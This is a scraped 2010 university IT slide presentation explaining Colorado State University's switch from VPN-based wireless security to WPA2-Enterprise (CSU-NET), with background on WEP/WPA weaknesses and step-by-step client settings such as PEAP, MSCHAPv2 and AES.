140 likes | 284 Views
No More VPN for Wireless!. PDI 2010 Steve Lovaas, ACNS. Wireless With CSU-NET Overview. Technology basics Wireless security at CSU so far The new way of doing things: CSU-NET Step-by-step configuration. Wireless: Where we started. Less controlled than wired network
E N D
No More VPN for Wireless! PDI 2010 Steve Lovaas, ACNS
Wireless With CSU-NET Overview • Technology basics • Wireless security at CSU so far • The new way of doing things: CSU-NET • Step-by-step configuration
Wireless: Where we started • Less controlled than wired network • Anyone can try to connect • Wasn’t designed with ANY security • Early security add-ons (WEP) were poor! • Technology was useful before it was safe… • We should have predicted that
Wireless: Where We’ve Been • Protect our resources • Find malicious users • Protect private traffic • Early hardware didn’t support native crypto • Security standards slow to evolve • Easiest solution: VPN Authenticate & Encrypt
CSU Wireless Security: VPN • Cisco VPN: The OLD Way • Require VPN to reach wired LAN or Internet • Pre-load application and profile • Encrypted tunnel to VPN server • Can sort some by group profile, separate IP space
CSU Wireless Security: VPN • Problems with the VPN approach • Install & maintain • System compatibility • Client vulnerabilities • Licensing $$ • Dropped connections • Waste of IP addresses • Hassle!
CSU Wireless Security: SSL gateway • A newer approach, easier • Application & profile dynamically downloaded • Web based • Compatible with more systems, through firewalls • Sorts on username, Windows OU, etc.
CSU Wireless Security: SSL gateway • Problems with the SSL gateway approach • It’s a lot easier, but… • Java/ActiveX downloads and permissions • Java/ActiveX vulnerabilities • Licensing $$
Wireless Security Standards • Letting the wireless client & AP do the work • First try: WEP (shared-key) = BAD • Next try: WPA = slightly better protocol • Finally: WPA2 = stronger encryption, too • But these all rely on shared keys (passwords) • And those can be stolen, broken
Wireless Security Standards • WPA2 Enterprise = can replace VPN • Finalized in 2004 (IEEE 802.11i) • Centralized authentication (RADIUS) • Strong encryption (AES) • Native to client (no extra software to install) • The official standard now (802.11 – 2007) • More compatibility (Win/Mac/Linux/mobile/etc.) • This is CSU-NET!
CSU-NET Architecture Surfing Encrypted Authenticated
How-To: Prerequisites • Operating system up to date • XP SP3 (or SP2 with patch) • Vista, Windows 7 • Mac OS X since 10.4 • Recent Linux • Wireless card drivers up to date • Download from manufacturer • Must support WPA2
How-To: Settings • Just a few basic settings • Authentication: WPA2-Enterprise • Encryption: AES • Authentication Type: PEAP • Authentication Protocol: MSCHAP v2 • Certificate Authority: Equifax • ACNS web site instructions for Win, Mac • Updating for Equifax CA rather than IPS Servidores